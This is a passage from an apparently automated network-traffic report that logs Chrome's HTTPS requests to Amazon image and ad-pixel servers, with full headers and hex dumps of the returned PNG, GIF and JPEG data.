                                                                                                                                                                                                                                                                      Data Ascii: ii_ta/V}IJ*<s0W$IA@,!Ff?4hmWh'~[4|Jn}aG>:{q]K4%DpI>#l/rI`<*.<7;0iVTa01 _:4'[#8UK6[-N`R7g>Y'sO6IHbD.@,iHnxezgK%4


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      69192.168.2.54979918.239.85.2234432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC375OUTGET /images/S/sash/ydDD9hnRfziI$y7.png HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC860INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                                                                                                      Content-Length: 5861
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      Date: Sun, 29 Oct 2023 00:40:14 GMT
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: 47db1362-cf8c-495e-9d95-e3f21435dde0
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Wed, 30 Dec 2020 19:09:23 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-940,/images/S/sash/ydDD9hnRfziI$y7
                                                                                                                                                                                                                                                                      Expires: Sun, 27 Sep 2043 20:15:49 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-940 /images/S/sash/ydDD9hnRfziI$y7
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Via: 1.1 06cdb267b93af0cbfcd6cc564136784a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 25724910
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: CJuywq6wnBFoF2cZTcUpEDmu7mAerngTv-Ig6uz3qHNOAw7ZLs6Zsw==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC5861INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 88 00 00 00 68 08 06 00 00 00 2a fe b8 d0 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 0a 3a 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 48 89 9d 96 77 54 54 d7 16 87 cf bd 77 7a a1 cd 30 14 29 43 ef bd 0d 20 bd 37 a9 d2 44 61 98 19 60 28 03 0e 33 34 b1 21 a2 02 11 45 44 04 15 41 82 22 06 8c 86 22 b1 22 8a 85 80 60 c1 1e 90 20 a0 c4 60 14 51 51 79 33 b2 56 74 e5 e5 bd 97 97 df 1f 67 7d 6b 9f bd f7 3d 67 ef 7d d6 ba 00 90 bc fd b9 bc 74 58 0a 80 34 9e 80 1f e2 e5 4a 8f 8c 8a a6 63 fb 01 0c f0 00 03 cc 00 60 b2 32 33 02 42 3d c3 80 48 3e 1e 6e f4 4c 91 13 f8 22 08 80 37 77 c4 2b 00 37 8d bc 83 e8 74 f0 ff 49 9a 95 c1 17 88 d2 04 89 d8 82 cd c9 64 89 b8 50
                                                                                                                                                                                                                                                                      Data Ascii: PNGIHDRh*gAMAa:iCCPPhotoshop ICC profileHwTTwz0)C 7Da`(34!EDA"""` `QQy3Vtg}k=g}tX4Jc`23B=H>nL"7w+7tIdP


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      70192.168.2.54981152.94.222.1274432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC575OUTGET /x/px/RIvbt4KWdIib_MEoD1J-U6gAAAGRdjK04QMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICA2QY_d/atf/%7B%22atf%22:true%7D HTTP/1.1
                                                                                                                                                                                                                                                                      Host: aax-eu.amazon.ae
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      Cookie: session-id=261-8635865-4706955; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=260-8031893-3804011
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC330INHTTP/1.1 200
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:45 GMT
                                                                                                                                                                                                                                                                      Content-Type: image/gif
                                                                                                                                                                                                                                                                      Content-Length: 43
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      x-amz-rid: 8M1ZE2VKADQ276K6XG7W
                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                      Vary: Content-Type,Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=47474747; includeSubDomains; preload
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 f0 00 00 00 00 00 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                                                                                      Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      71192.168.2.54981052.94.222.1274432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC773OUTGET /x/px/RIvbt4KWdIib_MEoD1J-U6gAAAGRdjK04QMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICA2QY_d/v/%7B%22wh%22:907,%22ww%22:1280,%22sx%22:0,%22sy%22:0,%22ah%22:19,%22aw%22:300,%22top%22:519,%22left%22:959.984375,%22v%22:%7B%22p%22:0,%22t%22:0,%22def%22:%22amzn%22%7D,%22ptv%22:1724264921.256,%22ttv%22:1724264921.256%7D HTTP/1.1
                                                                                                                                                                                                                                                                      Host: aax-eu.amazon.ae
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      Cookie: session-id=261-8635865-4706955; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=260-8031893-3804011
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC330INHTTP/1.1 200
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:45 GMT
                                                                                                                                                                                                                                                                      Content-Type: image/gif
                                                                                                                                                                                                                                                                      Content-Length: 43
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      x-amz-rid: AZY0ZR79EJSGPXGQV80B
                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                      Vary: Content-Type,Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=47474747; includeSubDomains; preload
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 f0 00 00 00 00 00 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                                                                                      Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      72192.168.2.549809151.101.1.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC611OUTGET /images/I/31+hYY59fPL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 3914
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: 65de6936-c552-4484-91cd-7b66ca8722ea
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Tue, 12 Sep 2023 23:27:14 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Expires: Sun, 10 Jul 2044 21:03:06 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 788369
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:44 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kjyo7100138-IAD, cache-ewr-kewr1740060-EWR
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 32 00 01 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 06 04 05 07 09 01 02 03 08 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fb 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"2,
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: aa 5f 85 b0 c3 15 20 f8 3e 74 f9 53 9e 9c 51 28 a8 3e c8 f5 df e4 ee e9 36 0a 8e d0 44 9f 3d d3 a4 45 e8 94 4a 27 94 03 e7 1e bd 54 7e 94 b2 b0 f6 fe e1 4f 26 1b 05 ea a2 f5 89 5d 5f 9d 14 5e b4 f0 b0 6b 71 2e 12 da cf 90 77 e9 fa 80 ba 0d 4a e8 35 2b a0 d4 ae 83 52 ba 05 4a 3c 06 ac 8b 2f 6d d5 2f 6d d5 af 6d d5 2f 6d d5 2f 6d 55 2f 6d 55 26 fe 98 a9 3b f0 be 0a ca 0f 97 fc 03 ff c4 00 1d 11 00 02 02 02 03 01 00 00 00 00 00 00 00 00 00 00 00 11 01 30 10 12 02 31 50 21 ff da 00 08 01 02 01 01 08 00 f0 b5 10 b1 39 98 fb 54 76 4c 0c 78 9a 36 19 1d 8c 9e 38 76 3b 56 18 c7 e6 6b 7b b9 8c 63 f0 ff 00 ff c4 00 18 11 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 11 30 00 50 40 ff da 00 08 01 03 01 01 08 00 eb 95 6c 5c c7 b9 b3 9b 9d 4f ff c4 00 34 10 00 01 01
                                                                                                                                                                                                                                                                      Data Ascii: _ >tSQ(>6D=EJ'T~O&]_^kq.wJ5+RJ</m/mm/m/mU/mU&;01P!9TvLx68v;Vk{c0P@l\O4
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1158INData Raw: b1 81 91 a1 c1 20 e1 40 60 d1 70 ff da 00 08 01 01 00 01 3f 10 ff 00 61 52 2d 62 50 ee c6 10 f1 c7 c7 51 f5 34 c1 7a 69 59 3f df 21 27 f3 b2 18 c0 20 b8 bb dd 8d 06 ac c2 76 4c 3e f8 15 34 01 56 ea 21 6e 00 32 90 8a 77 f9 d3 fe cb a6 6d 22 cf 0b c3 ec 99 0c e8 fb 24 2b 26 e0 a1 1a 72 53 0e ba 24 ac ca 4c 0e 12 0c ad 5a c2 c2 ed b7 a0 2b 9a ad e0 2a 6c ab f0 ce 00 00 82 aa 41 d4 2f 2e 63 7a 99 0e 3a 32 70 b7 48 45 8e 9d 1b a4 ad f2 7e 61 b9 34 88 16 4d 5d e6 3e c1 db a6 9b 93 15 82 96 f8 98 50 35 98 af d3 f0 ee 7b ea c5 2a bd 56 fd ac 1c 24 45 e6 19 18 4e 76 da f5 30 e6 51 3b 0d f2 05 7d 85 fa 30 c2 35 d8 98 d2 87 56 d6 d6 57 f1 75 2e f2 b5 5e c9 a4 75 79 ee f9 26 36 b6 ee 98 8b ed 00 fa cb 2d 5d 65 80 1f d4 06 c5 f6 86 eb b9 8a 07 e2 1a 3d b4 8a eb ff 00
                                                                                                                                                                                                                                                                      Data Ascii: @`p?aR-bPQ4ziY?!' vL>4V!n2wm"$+&rS$LZ+*lA/.cz:2pHE~a4M]>P5{*V$ENv0Q;}05VWu.^uy&6-]e=


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      73192.168.2.549815151.101.1.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC611OUTGET /images/I/41YtSb5uAGL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 6554
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: b7a8d058-12f0-47e4-a826-306cf8e4e964
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Wed, 27 Mar 2024 10:43:46 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Expires: Fri, 12 Aug 2044 23:39:38 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 179300
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:44 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kiad7000056-IAD, cache-nyc-kteb1890025-NYC
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 00 05 06 07 08 02 03 04 01 09 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b9 60 00 00 00 07 87 a7 9e 80 00 00 00 07
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"4`
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: d5 95 95 95 b8 33 d9 79 1f 59 23 d2 9d b8 65 b7 f9 79 78 a7 cd 12 7f 34 f8 68 de e8 03 42 7f 05 47 dd 59 59 69 5a 56 95 a5 59 37 ad bc e5 8f 4f 0c b9 d6 5e 5e 29 f3 44 aa 27 d8 07 34 53 c8 4f a9 e8 aa 9e 61 7d 5e 09 7e e9 99 30 ad 2b 42 d0 b6 d3 c4 81 ac ea 78 75 32 25 97 3a cb cb c5 be 48 55 5c 5b a0 e2 98 64 1b 8a a2 87 69 bc 27 d5 d3 32 61 4c 2b 4a d0 b4 2d b4 f1 ad 17 17 65 54 16 2b ac b7 d2 6e 56 35 56 10 c7 a4 bc b4 d2 bb 2d 2d e2 fb 92 66 4c c9 85 30 ad 2b 4a d2 9c 15 ac ab a3 b5 d6 5b 7f 99 b9 59 92 6d 73 69 55 30 ec f6 50 e4 0f 52 42 c9 99 33 26 65 65 65 65 64 62 ab 87 aa cb 9d 65 e5 3f f7 2b 85 96 2f f2 43 c8 8f a9 21 64 cc 99 93 32 b2 b2 b7 03 76 55 7e 76 59 6b a4 dc 9a d9 36 e1 90 96 5e 8f 72 a9 cd 62 fe f8 79 11 75 24 28 53 26 f0 53 7c 8b b7
                                                                                                                                                                                                                                                                      Data Ascii: 3yY#eyx4hBGYYiZVY7O^^)D'4SOa}^~0+Bxu2%:HU\[di'2aL+J-eT+nV5V--fL0+J[YmsiU0PRB3&eeeedbe?+/C!d2vU~vYk6^rbyu$(S&S|
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: f5 69 80 8e 11 b5 1f 45 75 8a 8a 11 8d 13 e5 ea 8e cc 7f 68 e2 a0 ef 87 1a 45 94 75 a9 c9 a5 5e 0f 57 cf 6f 05 6f 19 f0 6f 54 c3 b0 d0 78 44 dd 0b d3 b6 cb ad 77 92 7c 63 dc bc 7e 2a 32 69 57 83 d1 80 16 94 ca 3c e9 98 c1 18 cf 83 7a a7 7f 2c c6 8b 60 a9 db 14 0e 22 c0 a5 03 8c ae d4 7f 1d 6a 32 69 57 e1 72 c4 2e 6a f4 22 d5 d9 84 f8 37 ad 5e 5d 2a fc 2e 98 7d b7 b0 6f 5a bc 1b 57 e1 72 b6 e4 e3 1f 35 68 f7 dd c1 bd 6a 7d 26 c1 b5 78 3e 61 6e f6 0d eb 55 7a c9 a5 55 a6 c4 76 a2 c7 53 18 d4 60 de b5 57 1d 56 5d 2a ae 01 77 64 ea 30 6f 5a ab da b0 6d 57 7a 53 f2 b0 7d 46 0d eb 55 81 59 34 a9 c1 77 01 f7 a1 60 fa 8f 0b 75 35 18 26 fc be eb c2 b2 69 53 79 57 bb 45 83 ea 3c 2d d4 ee d3 c2 71 1e 0a 3f e2 af 59 34 a9 b8 2b c4 79 d2 b3 d4 78 5b a9 dd 3b 23 14 36
                                                                                                                                                                                                                                                                      Data Ascii: iEuhEu^WoooTxDw|c~*2iW<z,`"j2iWr.j"7^]*.}oZWr5hj}&x>anUzUvS`WV]*wd0oZmWzS}FUY4w`u5&iSyWE<-q?Y4+yx[;#6
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: 2f 0f d4 27 4e 9d 3a 25 3a 75 57 09 50 f0 19 ce c9 46 83 81 7b 03 f0 7e 29 c4 98 d4 1b 93 4c 00 1e b9 23 c9 31 1b 9c 42 8a 40 0e a3 bf 2b df c9 0f 76 81 45 4d 00 03 a2 f1 7d 42 74 e9 d3 a7 4f 65 7c 25 40 90 e4 82 fc c3 d2 11 89 41 0d da ed 93 a3 2f 0e 80 88 94 d3 2b 07 50 42 05 98 00 5e c3 15 46 ae 40 03 14 31 ed 29 cd 7a 7d 7c d9 e0 fa 84 e9 d3 a7 e0 ab 80 a8 14 3a c7 04 9c 8d b0 4c d5 a0 0c 06 5d fe 76 b0 2d 81 e6 00 26 75 2f f7 e1 46 48 88 0b 09 0f 83 0b d5 3a b9 0e 7e 6f 77 f8 9e c1 00 7b bf 2c f1 7d 42 74 e9 d3 f0 1b 70 57 50 b1 d0 08 23 00 33 c4 a0 0e c0 48 c0 82 fd 8c 58 88 93 4d e2 8d 58 b0 65 e8 92 e0 0f 10 b5 7b 87 3c 2f ec 87 93 e9 79 3c 8f 3a c9 7e 04 cb 8d 76 8f ab 3c 3f 50 9f 8d 8e 00 b0 63 60 91 b8 07 29 ac dd 05 c1 da 50 a9 84 2a 3a cf f1
                                                                                                                                                                                                                                                                      Data Ascii: /'N:%:uWPF{~)L#1B@+vEM}BtOe|%@A/+PB^F@1)z}|:L]v-&u/FH:~ow{,}BtpWP#3HXMXe{</y<:~v<?Pc`)P*:
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1042INData Raw: de fc fa 92 8e a8 fd 13 ba 54 cc 13 fb d6 41 99 4a de 07 fd 70 18 78 06 18 60 76 c5 35 a1 09 49 4c ab d6 fa df e8 99 f7 53 e6 d9 41 f0 d2 80 0b bb c0 8c 3c 03 0f 00 3b 81 47 d0 a3 6a a5 57 18 01 8d 89 40 bf b9 33 6d 23 1e bf 39 8d b7 2f cd fc cc c7 86 c6 1e 20 61 83 db 21 a8 04 3a 90 a3 76 d9 a7 5b 89 50 c7 81 35 d1 d6 05 10 32 57 75 52 1a ee 65 6a 1c 99 e5 16 a9 93 7c 3e c9 c7 8a c1 e0 18 61 8c e2 26 18 38 1d 31 19 b0 ad ce 4f 9b 08 de b9 65 a5 44 9c 54 08 38 70 ba 2c 6a a5 b4 b6 d1 0b 75 5c 8e cc 0c fb 6e fe 4b dd 66 9e e5 ed 1b 85 66 e1 2b cd 8d f7 a6 3c 1a 30 c3 c0 3c 0c a5 27 b1 91 ad 18 14 2f e1 ea be 11 bc 56 8a ce a6 05 f0 04 cc d0 0e 5a b2 ab 2f db 09 3d ed 72 5a 8f b0 f4 82 a2 85 2c e5 9a 14 82 ef 71 8e ed 98 03 04 68 ee 5d a3 b7 d5 44 1e d4 11
                                                                                                                                                                                                                                                                      Data Ascii: TAJpx`v5ILSA<;GjW@3m#9/ a!:v[P52WuRej|>a&81OeDT8p,ju\nKff+<0<'/VZ/=rZ,qh]D


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      74192.168.2.549814151.101.1.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC611OUTGET /images/I/31zyL4SK5OL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 4956
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: c532ee1d-15e6-4c13-a67b-4fe07178266e
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
